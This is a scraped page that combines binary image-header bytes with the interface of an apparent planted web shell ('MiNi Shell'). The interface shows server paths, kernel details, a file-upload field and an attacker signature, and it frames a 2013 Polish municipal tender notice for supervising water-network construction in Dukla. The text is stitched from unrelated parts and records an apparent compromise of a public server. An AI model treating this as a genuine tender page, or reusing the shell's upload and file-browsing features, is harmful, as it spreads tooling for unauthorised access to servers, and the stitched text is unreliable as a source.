JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130705/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130705/134429-N-2013.html

<p class="kh_header"><b>Dukla: Pełnienie funkcji Inspektora Nadzoru Inwestorskiego nad realizacją zadania : Budowa sieci wodociągowej w miejscowościach : Wietrzno, Zboiska, Równe i Cergowa</b><br>
<b>Numer ogłoszenia: 134429 - 2013; data zamieszczenia: 05.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dukla , ul. Trakt Węgierski 11, 38-450 Dukla, woj. podkarpackie, tel. 013 4329135, faks 013 4331011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dukla.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora Nadzoru Inwestorskiego nad realizacją zadania : Budowa sieci wodociągowej w miejscowościach : Wietrzno, Zboiska, Równe i Cergowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji Inspektora Nadzoru Inwestorskiego nad realizacją zadania : Budowa sieci wodociągowej w miejscowościach : Wietrzno, Zboiska, Równe i Cergowa
Inwestycja pt. Budowa sieci wodociągowej w miejscowości Wietrzno, Zboiska, Równe, Cergowa,
Gmina Dukla obejmuje:
- budowę sieci wodociągowej,
- zabezpieczenie skrzyżowań wodociągu z drogami, powiatowymi i drogą krajową nr 9
- zabezpieczenie skrzyżowań wodociągu z ciekami wodnymi,
- zabezpieczenie skrzyżowań wodociągu z uzbrojeniem podziemnym (gazociągi, kable
energetyczne i telekomunikacyjne),
- przebudowę zbiornika wyrównawczego i pompowni wody w Wietrznie.
- przebudowę i modernizację stacji uzdatniania wody w Wietrznie.
Istotne parametry inwestycji.
Sieć wodociągowa.
- budowa wodociągu z rur PE 100RC SDR17 PN10 o140 mm - 4 239,30 m
- budowa wodociągu z rur PE 100RC SDR17 PN10 o110 mm - 124,30 m
- budowa wodociągu z rur PE 100RC SDR17 PN10 o75 mm - 591,30 m
- budowa wodociągu z rur PE 100RC SDR17 PN10 o50 mm - 952,0 m
- budowa wodociągu z rur PE 100RC SDR17 PN10 o40 mm - 278,0 m
- budowa wodociągu z rur PE 100RC SDR17 PN10 o32 mm - 864,0 m
- budowa wodociągu z rur PE 100RC SDR11 o140 mm podwiertem horyzontalnym - 52,70 m
- budowa wodociągu z rur PE 100RC SDR11 o110 mm podwiertem horyzontalnym - 13,70 m
- budowa wodociągu z rur PE 100RC SDR11 o75 mm podwiertem horyzontalnym - 10,70 m
- budowa hydrantów nadziemnych o80 mm - 19 szt.
- budowa zasuw odcinających DN32 z obudową i skrzynką - 40 szt.
- montaż wodomierzy domowych DN20 - 81 szt.
- montaż wodomierzy DN32 - 1 szt.
- montaż zaworów antyskażeniowych DN20 - 81 szt.
- montaż zaworów antyskażeniowych DN32 - 1 szt.
- montaż studzienek wodomierzowych z zaworami DN20 - 3 szt.
- zabezpieczenie skrzyżowań z drogami powiatowymi i drogą krajową nr 9 metodą podwiertu
horyzontalnego:
rurą ochronną o250×22,7 mm PE SDR11, Lc = 45,0 m
rurą ochronną o140×12,7 mm PE SDR11, Lc = 26,30 m
- zabezpieczenie skrzyżowań z drogą powiatową metodą przekopu:
rurą ochronną o250×22,7 mm PE SDR11, Lc = 71,0 m
- zabezpieczenie skrzyżowań z kablami energetycznymi i teletechnicznymi rurą ochronną
dwudzielną Arota typ A110PS, L= 2,20 m - 21 szt
- zabezpieczenie skrzyżowań z ciekami wodnymi metodą podwiertu horyzontalnego:
rurą ochronną o250×22,7 mm PE SDR11, Lc = 87,20 m
Przebudowa zbiornika wyrównawczego i pompowni wody w Wietrznie.
- montaż rurociągu ze zbiornika wyrównawczego z rur PE 100RC SDR17 PN10 o140 mm-16,0 m
- montaż kosza ssawnego DN150 w zbiorniku wyrównawczym - 1 szt.
- montaż komory wodomierzowej żelbetowej z wyposażeniem - 1 kpl.
- montaż zasuwy kołnierzowej DN125 z obudowa i skrzynką - 1 szt.
- uzupełnienie obsypki ziemnej zbiornika wyrównawczego - 30,0 m3
- wymiana pomp w hydroforni typ SA.80.02.1.1020, Ns = 11 kW - 2 szt.
- dostawa i montaż agregatu prądotwórczego o mocy 19,2 kVA - 1 szt.
- przebudowa ogrodzenia z bramą wjazdową i furtką - 146 mb
Przebudowa zbiornika wyrównawczego i pompowni wody w Wietrznie.
- przebudowa pomieszczeń stacji uzdatniania wody
- wyłożenie posadzki pomieszczeń płytkami antypoślizgowymi - 115,77 m2
- wyłożenie posadzki pomieszczeń płytkami na żywicach chemoodpornych - 23,37 m2
- wyłożenie ścian pomieszczenia technologicznego i chloratorni płytkami do wys. 2,0 m - 51,52 m2
- malowanie ścian i sufitów pomieszczeń wewnętrznych - 366,99 m2
- wymiana lamp oświetleniowych w pomieszczeniach - 8 szt.
- wymiana wentylatora dachowego WD20 - 1 szt.
- montaż chloratora ze zbiornikiem V=60l - 1 kpl.
- wymiana pomp w studni czerpalnej nr 1, typ GG 0.01.2, Ns = 2,2 kW - 2 szt.
- wymiana pomp w studni czerpalnej nr 2, typ GC 2.05.2.2, Ns = 11 kW - 2 szt.
- dostawa i montaż agregatu prądotwórczego o mocy 30,0 kVA - 1 szt.
- wymiana wodociągu o110 mm PVC na o125 mm PE 100RC SDR17
ze studni czerpalnej nr 1 do studni czerpalnej nr 2 - 206,0 mb
- wymiana zasuw odcinających DN100 kołnierzowych z kółkiem w studni czerpalnej nr 1 - 3 szt.
- wymiana zasuw odcinających DN80 kołnierzowych z kółkiem w studni czerpalnej nr 1 - 2 szt.
- wymiana zaworów zwrotnych kątowych DN80 kołnierzowych w studni nr 1 - 2 szt.
- wymiana zaworów zwrotnych kątowych DN100 kołnierzowych w studni nr 2 - 2 szt.
- wymiana zasuw DN100 z obudową dł. 2,5m i skrzynką - 4 szt.
- wymiana zasuw DN125 z obudową dł. 2,5m i skrzynką - 1 szt.
- montaż zasuw kołnierzowych DN125 z obudową i skrzynką - 1 szt.
- docieplenie elewacji budynku płytami styropianowymi gr. 12 cm - 262,01 m2
- wykonanie cokołu zewnętrznego z płytek z kamieni sztucznych - 34,89 m2
- wyłożenie schodów zewnętrznych płytkami antypoślizgowymi - 8,80 m2
- wykonanie płytki odbojowej z kostki brukowej wokół budynku - 58,04 m2
Zakres obowiązków inspektora nadzoru:
1)	analiza dokumentacji technicznej, uzgodnień oraz decyzji w celu zidentyfikowania problemów                   i podjęcia działań zaradczych,
2)	wyegzekwowanie od projektanta uzupełnień lub poprawienie dokumentacji w trakcie realizacji robót w przypadku ujawnienie wad tej dokumentacji,
3)	zatwierdzenie, sprawdzenie i uaktualnienie harmonogramu robót Wykonawcy,
4)	sprawdzanie czy wszystkie osoby zatrudnione przez Wykonawcę posiadają kwalifikacje oraz uprawnienia do prowadzenie prac budowlanych - jeżeli takie są wymagane,
5)	sprawdzenie czy wszystkie używane urządzenia i materiały posiadają wymagane świadectwa                   i certyfikaty,
6)	kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla procesu budowlanego oraz wyceny robót,
7)	prowadzenie sprawozdawczości i biura nadzoru inwestorskiego w czterogodzinnym czasie pracy  i przeciętnie dwadzieścia godzin w pięciodniowym tygodniu pracy,
8)	organizowanie i prowadzenie narad technicznych, problemowych i innych spotkań zwoływanych przez Zamawiającego na wniosek Inspektora Nadzoru lub Wykonawcy i ich protokołowanie,
9)	weryfikacja, analiza i zatwierdzanie do zapłaty faktur wystawionych przez Wykonawcę                               w związku z realizacją zadania,
10)	sprawdzanie jakości wykonywanych robót, wbudowanych elementów budowlanych                                   a w szczególności zapobiegania zastosowania materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
11)	odbiór i sprawdzenie robót budowlanych ulegających zakryciu lub zanikających: dodatkowo powinien uczestniczyć w odbiorach częściowych  i końcowych jak również przygotować i brać udział w odbiorach gotowych obiektów,
12)	zawieszenie prowadzenia robót budowlanych w przypadku gdy ich kontynuacja może wywołać zagrożenie życia lub zdrowia bądź spowodować znaczne straty materialne,
13)	uzgodnienie w Wykonawcą rodzaju dokumentacji powykonawczej; sprawdzenie jej                                 i zatwierdzenie do odbioru
14)	uczestniczyć w przeglądach gwarancyjnych bez domagania się dodatkowej zapłaty.
Wykonawca musi dysponować inspektorem branży : sanitarnej, elektrycznej i ogólnobudowlane.
Wykonawca a w przypadku zmiany swojej siedziby obowiązany jest niezwłocznie o tym fakcie powiadomić Zamawiającego.
Dla zobrazowania całości robót budowlanych Zamawiający do niniejszej SIWZ dołącza przedmiar robót ( załącznika Nr 6).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.54.10.00-2, 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu, przed upływem terminu składania ofert, Wykonawca zobowiązany jest wnieść wadium. Kwota wadium wymaganego wynosi 1 000,00 zł słownie : jeden tysiąc złotych.
2) Wykonawca może wnieść wadium w jednej lub kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia             9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U.              z 2007 r. Nr 42, poz. 275, z późn. zm.)
Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Gminy Dukla, 38-450 Dukla ul. Trakt Węgierski 11  - Podkarpacki Bank Spółdzielczy w Sanoku o/Dukla                                             58 86421096 2010 9600 1833 0002 z adnotacją Wadium  do przetargu: Pełnienie funkcji Inspektora Nadzoru Inwestorskiego nad realizacją zadania : Budowa sieci wodociągowej w miejscowościach : Wietrzno, Zboiska, Równe i Cergowa
W przypadku wniesienia wadium w pieniądzu za moment wniesienia uznaje się moment uznania rachunku Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia wg załącznika Nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	oferta przetargowa wg Załącznika Nr 1 do SIWZ, 
b)	oświadczenie o spełnieniu warunków  art. 22 ust. 1 i art. 24 ust. 1 pzp wg Załącznika Nr 2 do SIWZ   - Zał. Nr 1 do oferty.
c)	oświadczenie o podwykonawcach, w przypadku braku podwykonawców w realizacji zadania również oświadczenie o braku podwykonawców (art.36 ust5 pzp ) wg Załącznika Nr 3 do SIWZ   - Zał. Nr 2  do oferty.
d)	oświadczenie o grupach kapitałowych w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U Nr 50 , poz.331, z późn. zm.) wg Załącznika Nr 4 do SIWZ   - Zał. Nr 3  do oferty.
e)	zaakceptowany i wypełniony przez wykonawcę projekt umowy wg Załącznika Nr 5do SIWZ   - Zał. Nr 4 do oferty.
f)	potwierdzenie wniesienia wadium - Zał. Nr 5 do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w umowie zamawiający zgodnie z art.144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podanych warunków ich wprowadzenia 
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b)	zmiana obowiązującej stawki VAT;
c)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych realizacji projektu ;
d)	rezygnacja przez zamawiającego z realizacji części przedmiotu umowy ;
e)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dukla.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dukli, 38-450 Dukla, ul. Trakt Węgierski 11, pokój Nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2013 godzina 08:00, miejsce: Urząd Miejski w Dukli, 38-450 Dukla, ul. Trakt Węgierski 11, pokój Nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze usługi objęte są dofinansowaniem przez Unię Europejską w ramach działania 4.1 Infrastruktura ochrony środowiska Schemat B - Zaopatrzenie w wodę Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007- 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com